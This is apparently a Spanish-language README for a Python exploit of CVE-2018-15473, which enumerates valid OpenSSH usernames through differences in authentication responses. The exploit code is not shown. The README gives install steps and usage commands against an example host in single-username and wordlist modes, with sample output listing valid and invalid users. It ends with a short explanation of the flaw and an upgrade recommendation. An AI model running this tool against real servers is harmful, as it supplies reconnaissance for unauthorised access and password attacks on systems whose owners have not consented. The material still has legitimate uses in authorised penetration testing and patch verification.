
# Exploit en Python para CVE-2018-15473 que permite la enumeración de nombres de usuario en OpenSSH mediante un oráculo de respuesta de autenticación, con modos de usuario único y lista de palabras.
SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)
Versión editada del exploit original: https://www.exploit-db.com/exploits/45233
#Install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./Exploit.py -h
El sistema responde de manera diferente a los intentos de autenticación válidos e inválidos. Un usuario remoto puede enviar solicitudes especialmente diseñadas para determinar nombres de usuario válidos en el sistema objetivo. Así, un usuario remoto puede determinar nombres de usuario válidos en el sistema objetivo.
El servidor OpenSSH debe actualizarse a la versión 7.7 o superior.